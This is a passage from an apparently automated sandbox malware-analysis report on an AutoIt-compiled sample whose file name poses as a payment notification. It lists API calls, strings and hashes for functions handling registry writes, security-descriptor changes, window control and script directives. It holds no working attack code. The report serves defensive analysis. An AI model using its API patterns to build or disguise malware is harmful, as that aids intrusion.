SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009C0504

Part of subcall function 0094F9F2: _wcslen.LIBCMT ref: 0094F9FD

Part of subcall function 0099223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00992258
Part of subcall function 0099223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0099228A

Strings

GETITEMCOUNT, xrefs: 009C0316, 009C0337
GETTEXT, xrefs: 009C03EC, 009C0407
SELECTALL, xrefs: 009C0515
DESELECT, xrefs: 009C059C
SELECTCLEAR, xrefs: 009C052D
SELECT, xrefs: 009C0548
GETSELECTED, xrefs: 009C05E1
VIEWCHANGE, xrefs: 009C0675
GETSELECTEDCOUNT, xrefs: 009C0470, 009C048B
GETSUBITEMCOUNT, xrefs: 009C0384, 009C039F
ISSELECTED, xrefs: 009C04DD
FINDITEM, xrefs: 009C0627
SELECTINVERT, xrefs: 009C057E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 9ef3972a287eaf46091005794e9592e3cd83a3723ced4b0d13a88b3f50890106
Instruction ID: b5ea62041c5b3f5eb4c05ecf6070a049ad8eaf406b761079af46ff7daa3bad49
Opcode Fuzzy Hash: 9ef3972a287eaf46091005794e9592e3cd83a3723ced4b0d13a88b3f50890106
Instruction Fuzzy Hash: 0AE18C31608341DBCB28DF28C551E2AB7EABFC8714F144A5CF8969B2A1DB30ED45CB52

Function 00948891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00948968
GetSystemMetrics.USER32(00000007), ref: 00948970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0094899B
GetSystemMetrics.USER32(00000008), ref: 009489A3
GetSystemMetrics.USER32(00000004), ref: 009489C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009489E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009489F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00948A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00948A3C
GetClientRect.USER32(00000000,000000FF), ref: 00948A5A
GetStockObject.GDI32(00000011), ref: 00948A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00948A81

Part of subcall function 0094912D: GetCursorPos.USER32(?), ref: 00949141
Part of subcall function 0094912D: ScreenToClient.USER32(00000000,?), ref: 0094915E
Part of subcall function 0094912D: GetAsyncKeyState.USER32(00000001), ref: 00949183
Part of subcall function 0094912D: GetAsyncKeyState.USER32(00000002), ref: 0094919D

SetTimer.USER32(00000000,00000000,00000028,009490FC), ref: 00948AA8

Strings

AutoIt v3 GUI, xrefs: 00948A20

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 72813f80a08f6c8d952cef71106bc07b331b337006104e9ca1f2bf4b12ec299c
Instruction ID: 8e63db333461db076bbb658dbb64d53e9f17dc50e7186a31c73dbaddfafb138e
Opcode Fuzzy Hash: 72813f80a08f6c8d952cef71106bc07b331b337006104e9ca1f2bf4b12ec299c
Instruction Fuzzy Hash: 67B16D71A0420AAFDB14DFA8DD45FEE3BB5FB48314F104229FA19AB290DB74E941CB51

Function 00990D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00991114
Part of subcall function 009910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 00991120
Part of subcall function 009910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 0099112F
Part of subcall function 009910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 00991136
Part of subcall function 009910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0099114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00990DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00990E29
GetLengthSid.ADVAPI32(?), ref: 00990E40
GetAce.ADVAPI32(?,00000000,?), ref: 00990E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00990E96
GetLengthSid.ADVAPI32(?), ref: 00990EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00990EB5
HeapAlloc.KERNEL32(00000000), ref: 00990EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00990EDD
CopySid.ADVAPI32(00000000), ref: 00990EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00990F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00990F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00990F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00990F6E
HeapFree.KERNEL32(00000000), ref: 00990F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00990F7E
HeapFree.KERNEL32(00000000), ref: 00990F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00990F8E
HeapFree.KERNEL32(00000000), ref: 00990F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00990FA1
HeapFree.KERNEL32(00000000), ref: 00990FA8

Part of subcall function 00991193: GetProcessHeap.KERNEL32(00000008,00990BB1,?,00000000,?,00990BB1,?), ref: 009911A1
Part of subcall function 00991193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00990BB1,?), ref: 009911A8
Part of subcall function 00991193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00990BB1,?), ref: 009911B7

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 5152ca5c9ace3485fb28ae36e0b6d232b268cca0a382521ea6ba4faff36fbdb1
Instruction ID: 59066e9cc72646495ef7bd98fad698301600eb2b81b12afe90d39f849dc57257
Opcode Fuzzy Hash: 5152ca5c9ace3485fb28ae36e0b6d232b268cca0a382521ea6ba4faff36fbdb1
Instruction Fuzzy Hash: C67146B2D0420AAFDF20DFA9DC48FAEBBBCFF44301F048115E929A6191D7319A05CB60

Function 009BC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009BC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,009CCC08,00000000,?,00000000,?,?), ref: 009BC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 009BC5A4
_wcslen.LIBCMT ref: 009BC5F4
_wcslen.LIBCMT ref: 009BC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 009BC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 009BC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 009BC84D
RegCloseKey.ADVAPI32(?), ref: 009BC881
RegCloseKey.ADVAPI32(00000000), ref: 009BC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 009BC960

Strings

REG_QWORD, xrefs: 009BC8C3
REG_MULTI_SZ, xrefs: 009BC6F5
REG_DWORD, xrefs: 009BC804
REG_EXPAND_SZ, xrefs: 009BC5CD
REG_BINARY, xrefs: 009BC913
REG_SZ, xrefs: 009BC644

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 07900bdd7e13f8061ea554f73d10a42cf87ed91d6dd4707fc2d2ddaa69638e73
Instruction ID: 08f23e1a2495a485aa82537208e2489a1ed8495ac59cece24754f184ea7fc143
Opcode Fuzzy Hash: 07900bdd7e13f8061ea554f73d10a42cf87ed91d6dd4707fc2d2ddaa69638e73
Instruction Fuzzy Hash: 931259B56082019FDB14DF15C991B6AB7E5EF88724F04885DF88A9B3A2DB31ED41CF81

Function 009C091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009C09C6
_wcslen.LIBCMT ref: 009C0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009C0A54
_wcslen.LIBCMT ref: 009C0A8A
_wcslen.LIBCMT ref: 009C0B06
_wcslen.LIBCMT ref: 009C0B81

Part of subcall function 0094F9F2: _wcslen.LIBCMT ref: 0094F9FD

Part of subcall function 00992BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00992BFA

Strings

GETITEMCOUNT, xrefs: 009C0C1E
EXISTS, xrefs: 009C0B7C, 009C0B97
GETSELECTED, xrefs: 009C0C4E
GETTEXT, xrefs: 009C0C97
ISCHECKED, xrefs: 009C0CE1
SELECT, xrefs: 009C0D11
COLLAPSE, xrefs: 009C0B01, 009C0B1C
UNCHECK, xrefs: 009C0D3E
GETTOTALCOUNT, xrefs: 009C09F2, 009C0A17
EXPAND, xrefs: 009C0BF8
CHECK, xrefs: 009C0A85, 009C0AA0

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 1c00da603d09de866e3dca9e33fb922538a2379e05c0e60d87f805314c895de8
Instruction ID: 975fe49c096d3e38aa937c7e5bb3ed67dc4546f3c0e30a37da52d2ccd013b50b
Opcode Fuzzy Hash: 1c00da603d09de866e3dca9e33fb922538a2379e05c0e60d87f805314c895de8
Instruction Fuzzy Hash: 0BE17835A08701DFCB14DF69C450A2AB7E5BFD8318F10895CF8969B2A2D730ED45CB92

Function 009BC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,009BB6AE,?,?), ref: 009BC9B5
_wcslen.LIBCMT ref: 009BC9F1
_wcslen.LIBCMT ref: 009BCA68
_wcslen.LIBCMT ref: 009BCA9E
_wcslen.LIBCMT ref: 009BCAF9
_wcslen.LIBCMT ref: 009BCB2F
_wcslen.LIBCMT ref: 009BCB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 009BCA62, 009BCA67
HKEY_CLASSES_ROOT, xrefs: 009BCAF3, 009BCAF8
HKCR, xrefs: 009BCB29, 009BCB2E
HKU, xrefs: 009BCBF0
HKCC, xrefs: 009BCBAC
HKLM, xrefs: 009BCA98, 009BCA9D
HKEY_USERS, xrefs: 009BCBDF
HKCU, xrefs: 009BCBCE
HKEY_CURRENT_USER, xrefs: 009BCBBD
HKEY_CURRENT_CONFIG, xrefs: 009BCB79, 009BCB7E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 656fee900613aa9eb0234d2b0136e117d69cc1948600c5d633fb63876cc782b1
Instruction ID: fe915920b66b6bc746a600d14bd831ec74b4c0b1f2ccc469d51ba70553f1ef29
Opcode Fuzzy Hash: 656fee900613aa9eb0234d2b0136e117d69cc1948600c5d633fb63876cc782b1
Instruction Fuzzy Hash: 787108B261012A8BCB20DE7CCE516FF7799AFA0774F210528FC95AB284E635DD45C3A0

Function 009C833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009C835A
_wcslen.LIBCMT ref: 009C836E
_wcslen.LIBCMT ref: 009C8391
_wcslen.LIBCMT ref: 009C83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009C83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009C5BF2), ref: 009C844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009C8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009C84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009C8501
FreeLibrary.KERNEL32(?), ref: 009C850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009C851D
DestroyIcon.USER32(?,?,?,?,?,009C5BF2), ref: 009C852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009C8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009C8555

Strings

.icl, xrefs: 009C8368
.dll, xrefs: 009C83AB
.exe, xrefs: 009C8388

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: a6ded413befc2797e920e93579ec50a0ab52d6d0a7e314816d7da658749253db
Instruction ID: ba9eb42533868595ee91fbfcd49de174e8a796686224dc44fad671f420a9c0a7
Opcode Fuzzy Hash: a6ded413befc2797e920e93579ec50a0ab52d6d0a7e314816d7da658749253db
Instruction Fuzzy Hash: 3561F1B1904219BAEB18DF64CC41FBF7BACBB44B11F10454AF815D60E1DBB4AA80DBA0

Function 00937778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

", xrefs: 00975153
#comments-start, xrefs: 0093785F, 009378B1
#include, xrefs: 00937847
#requireadmin, xrefs: 009377FF
#notrayicon, xrefs: 009377E7
#pragma compile, xrefs: 009377D3
Bad directive syntax error, xrefs: 0097519A
#comments-end, xrefs: 009378D9
#ce, xrefs: 009378ED
Unterminated group of comments, xrefs: 0097528C
#OnAutoItStartRegister, xrefs: 00937817
#include-once, xrefs: 0093782F
Cannot parse #include, xrefs: 00975279
#cs, xrefs: 00937873, 009378C5
', xrefs: 00975169

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: bcf12a493f196dc1013ab27cf7fa5c7e1328f2433ceeb84e3051ecf65662b935
Instruction ID: 456f87eebf2df2b74a4e4a2f7d8ead7745b7255b7439e6c2eedbd228a21f7bc3
Opcode Fuzzy Hash: bcf12a493f196dc1013ab27cf7fa5c7e1328f2433ceeb84e3051ecf65662b935
Instruction Fuzzy Hash: 80810BB1A44605BBDB20AFA0CC53FAF77A9AF95300F054424FD09BB196EBB0D915CB91

Function 00995A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00995A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00995A40
SetWindowTextW.USER32(?,?), ref: 00995A57
GetDlgItem.USER32(?,000003EA), ref: 00995A6C
SetWindowTextW.USER32(00000000,?), ref: 00995A72
GetDlgItem.USER32(?,000003E9), ref: 00995A82
SetWindowTextW.USER32(00000000,?), ref: 00995A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00995AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00995AC3
GetWindowRect.USER32(?,?), ref: 00995ACC
_wcslen.LIBCMT ref: 00995B33
SetWindowTextW.USER32(?,?), ref: 00995B6F
GetDesktopWindow.USER32 ref: 00995B75
GetWindowRect.USER32(00000000), ref: 00995B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00995BD3
GetClientRect.USER32(?,?), ref: 00995BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00995C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00995C2F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: a8607fe706d0619e0b8640b0c8e87169928dd1a1acc12f7c18000ee040efb1cf
Instruction ID: 29f117a3ef02c43bb844f828080620af3b4eb30d2595524acb5eb19c189d3efe
Opcode Fuzzy Hash: a8607fe706d0619e0b8640b0c8e87169928dd1a1acc12f7c18000ee040efb1cf
Instruction Fuzzy Hash: DA716971900B09AFDB21DFA8CE85EAFBBF9FF48704F114918E586A25A0D775E940CB10

Function 009500C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009500C6

Part of subcall function 009500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A0070C,00000FA0,4D1370E4,?,?,?,?,009723B3,000000FF), ref: 0095011C
Part of subcall function 009500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009723B3,000000FF), ref: 00950127
Part of subcall function 009500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009723B3,000000FF), ref: 00950138
Part of subcall function 009500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0095014E
Part of subcall function 009500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0095015C
Part of subcall function 009500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0095016A
Part of subcall function 009500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00950195
Part of subcall function 009500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009501A0

___scrt_fastfail.LIBCMT ref: 009500E7

Part of subcall function 009500A3: __onexit.LIBCMT ref: 009500A9

Strings

kernel32.dll, xrefs: 00950133
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00950122
InitializeConditionVariable, xrefs: 00950148
SleepConditionVariableCS, xrefs: 00950154
WakeAllConditionVariable, xrefs: 00950162

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 9392213b4c7e27b85d26d498dd87b7bd190c9a2e60c39fc9e13758fb36f13a7b
Instruction ID: b884a8eb5ca183a92f5c323cff70e570eb4954bf36210aa67e030d8859fd5a59
Opcode Fuzzy Hash: 9392213b4c7e27b85d26d498dd87b7bd190c9a2e60c39fc9e13758fb36f13a7b
Instruction Fuzzy Hash: 6F212972E4CB016FD7109BB6AC15F6A3798EBC5B52F040129FC05A26D1DF7498048B92

Function 009930F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0099318D
_wcslen.LIBCMT ref: 009931F8

Strings

NAME, xrefs: 00993335, 00993346
CLASSNN, xrefs: 009931F3, 00993204
CLASS, xrefs: 00993188, 009931A5
TEXT, xrefs: 0099347C
INSTANCE, xrefs: 00993453
REGEXPCLASS, xrefs: 00993255, 00993266

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 1e15a12f10acb5b0c68ba64fbd44542f096f20565e038d79e28d9fb482f9d34f
Instruction ID: 5663df388006df29e060629be5605a15da129d83974888872b59367c59e66c25
Opcode Fuzzy Hash: 1e15a12f10acb5b0c68ba64fbd44542f096f20565e038d79e28d9fb482f9d34f
Instruction Fuzzy Hash: 80E1E532A00516ABCF28DFBCC4527EDBBB8BF94710F55C119E556E7250DB30AE858B90

Function 009A44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,009CCC08), ref: 009A4527
_wcslen.LIBCMT ref: 009A453B
_wcslen.LIBCMT ref: 009A4599
_wcslen.LIBCMT ref: 009A45F4
_wcslen.LIBCMT ref: 009A463F
_wcslen.LIBCMT ref: 009A46A7

Part of subcall function 0094F9F2: _wcslen.LIBCMT ref: 0094F9FD

GetDriveTypeW.KERNEL32(?,009F6BF0,00000061), ref: 009A4743

Strings

unknown, xrefs: 009A4708
removable, xrefs: 009A45EA, 009A45EF
cdrom, xrefs: 009A458F, 009A4594
all, xrefs: 009A4531, 009A4536
fixed, xrefs: 009A4635, 009A463A
ramdisk, xrefs: 009A46F1
network, xrefs: 009A469D, 009A46A2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
